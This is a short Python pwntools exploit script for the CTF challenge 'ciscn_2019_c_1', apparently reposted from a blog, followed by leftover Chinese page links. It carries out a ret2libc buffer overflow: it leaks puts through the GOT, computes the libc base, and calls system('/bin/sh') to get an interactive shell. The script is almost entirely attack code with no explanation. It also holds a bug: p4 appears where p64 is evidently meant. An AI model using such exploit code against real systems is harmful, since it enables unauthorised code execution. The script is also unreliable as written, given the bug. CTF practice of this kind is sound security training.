from pwn import * context.log_level='debug' #io=remote('node3.buuoj.cn',29121) io=process('./ciscn_2019_c_1') libc=ELF('./libc.so') elf=ELF("./ciscn_2019_c_1") buf_end=0x00007FFECCEAFE18 buf_start=0x00007FFECCEAFDC0 io.sendline('1') io.sendline('\x00'+(buf_end-buf_start-1)*'a'+p4(0x0000000000400c83)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.symbols['_start'])) libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.symbols['puts'] system=libc_base+libc.symbols['system'] io.sendline('1') io.sendline('\x00'+(buf_end-buf_start-1)*'a'+p64(0x0000000000400c83)+p64(libc_base+libc.search('/bin/sh').next())+p64(system)) io.interactive()
buuctf@ciscn_2019_c_1
猜你喜欢
转载自www.cnblogs.com/imiopr/p/12083783.html
今日推荐
周排行